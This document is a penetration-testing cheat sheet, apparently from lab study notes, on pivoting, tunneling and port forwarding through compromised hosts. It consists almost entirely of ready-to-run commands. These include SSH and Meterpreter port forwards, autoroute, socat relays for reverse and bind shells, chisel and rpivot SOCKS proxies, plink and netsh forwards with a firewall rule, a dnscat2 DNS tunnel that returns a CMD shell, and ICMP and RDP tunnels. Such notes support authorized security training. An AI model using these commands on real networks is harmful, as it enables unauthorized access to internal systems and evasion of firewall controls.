Pivoting, Tunneling & Port Forwarding
Enumeration
# Enumeration commands
ip a
ip route
ss -ntplu
# Starting tcpdump to listen on TCP/8080 through the tun0 interface
sudo tcpdump -nvvvXi tun0 tcp port 8080
Port Forwarding
Local Port Forwarding
# Forward a port on the remote host to a local listener over SSH (port 22)
# Syntax: ssh -N -L [LOCAL_IP:]LOCAL_PORT:DEST_IP:DEST_PORT user@pivot_host
ssh -N -L 0.0.0.0:4455:172.16.5.217:445 ubuntu@10.10.10.10
# Metasploit Meterpreter
# Start a listener on local port 3300 and forward traffic to the remote host on port 3389
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.129

Dynamic Port Forwarding
# Enable Dynamic Port Forwarding on port 1234 over SSH
ssh -N -D 0.0.0.0:1234 ubuntu@10.10.10.10
# Change proxychains configuration file to use our local port 1234
echo "socks5 127.0.0.1 1234" | tee -a /etc/proxychains.conf
# Metasploit Meterpreter
# Configure a local SOCKS proxy with the msf socks_proxy module; this opens local port 9050
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 5
msf6 auxiliary(server/socks_proxy) > run
# Change proxychains configuration file to use our local port 9050
echo "socks5 127.0.0.1 9050" | tee -a /etc/proxychains.conf
# Add a route with autoroute so the socks_proxy sends traffic for the subnet via the Meterpreter session
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run
# Alternatively, configure the route directly from the meterpreter session
meterpreter > run autoroute -s 172.16.5.0/23
# Listing Active Routes with AutoRoute
meterpreter > run autoroute -p

Reverse Port Forwarding
# Listen on port 8080 of InternalIPofPivotHost and forward connections to port 8000 on the attack host
# ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.15.50 -vN
# Metasploit Meterpreter
# Send all traffic received on the remote host on port 1234 to local port 8081
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.15.5

SSH Remote Dynamic Port Forwarding
# SSH Remote Port Forwarding
# Starting the SSH server
sudo systemctl start ssh
# Connect to kali and open local port 2345 there, forwarding traffic to 10.4.50.215:5432
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.0.4
# SSH Remote Dynamic Port Forwarding
# Connect to kali and open local port 2345 there as a SOCKS proxy that forwards traffic via the pivot host
ssh -N -R 2345 kali@192.168.0.4
# Change proxychains configuration file to use our local port 2345
echo "socks5 127.0.0.1 2345" | tee -a /etc/proxychains.conf

Socat Redirection
# Socat Redirection with a Reverse Shell
# Listen on port 8080 and forward all traffic to 10.10.14.18 port 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat -ddd TCP-LISTEN:8080,fork TCP:10.10.14.18:80
# Socat Redirection with a Bind Shell
# Listen on port 8080 and forward traffic to 172.16.5.19 port 8443
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
SSH Pivoting with sshuttle
# Use sshuttle to route traffic via the remote host over SSH (VPN-like behaviour over SSH)
sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
sshuttle -r ubuntu@10.129.202.64 0/0 -v
SSH for Windows
# Locate ssh.exe; if present, it can be used to pivot / port forward
where ssh
%systemdrive%\Windows\System32\OpenSSH
# Plink
# Plink Remote Port Forwarding
# Connect to kali and open local port 9833 there, forwarding traffic to 127.0.0.1:3389
cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw <mykalipassword> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.0.4
# Enable Dynamic Port Forwarding on local port 9050 over SSH
plink.exe -ssh -D 9050 ubuntu@10.129.15.50
# After that, use Proxifier to send traffic via port 9050
Port Forwarding with Windows netsh
# create a rule to allow connection from port 2222 in the Windows firewall
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=10.129.42.198 localport=2222 action=allow
# Using netsh.exe to Port Forward
# listen on port 2222 and forward received connection to connectaddress port 22
netsh.exe interface portproxy add v4tov4 listenport=2222 listenaddress=10.129.42.198 connectport=22 connectaddress=172.16.5.25
# Verifying Port Forward
netsh.exe interface portproxy show v4tov4
netstat -anp TCP | find "2222"
Web Server Pivoting with Rpivot
# Running server.py from the Attack Host
# Accept client connections on port 9999 and expose the SOCKS proxy on port 9050
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# Running client.py from Pivot Target
# Connect to attack host on port 9999
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
# Change proxychains configuration file to use our local port 9050
echo "socks5 127.0.0.1 9050" | tee -a /etc/proxychains.conf
Tunneling
DNS Tunneling with Dnscat2
# Starting the dnscat2 server
sudo ruby dnscat2.rb --dns host=10.1.1.1,port=53,domain=domain.local --no-cache
# Importing dnscat2.ps1 and establishing a DNS tunnel with the server to send back a CMD shell
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.1.1.1 -Domain domain.local -PreSharedSecret 0ec04..snip..89d21 -Exec cmd
dnscat2> ?
dnscat2> window -i 1
SOCKS5 Tunneling with Chisel
# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5
# Connecting to the Chisel Server from attack host
./chisel client -v 10.129.202.64:1234 socks
echo "socks5 127.0.0.1 1080" | tee -a /etc/proxychains.conf
# Chisel Reverse Pivot
# Starting the Chisel Server on Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5
echo "socks5 127.0.0.1 1080" | tee -a /etc/proxychains.conf
# Connecting the Chisel Client from Pivot Host
./chisel client -v 10.10.14.17:1234 R:socks
# ssh over socks5 proxy like : proxychains ssh admin@10.4.5.5
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' admin@10.4.5.5
ICMP Tunneling with SOCKS
# Starting the ptunnel-ng Server on the Target Host.
sudo ./ptunnel-ng -r10.129.202.64 -R22 # 10.129.202.64 is the IP of the target host
# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1
# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
RDP and SOCKS Tunneling with SocksOverRDP
# Loading SocksOverRDP.dll using regsvr32.exe on attack host
regsvr32.exe SocksOverRDP-Plugin.dll
# Now we can connect to pivot host over RDP using mstsc.exe
# start SocksOverRDP-Server.exe with Admin privileges on pivot host.
# On the attack host, confirm the SOCKS listener is started; then forward all traffic to 127.0.0.1:1080 with Proxifier
netstat -antb | findstr 1080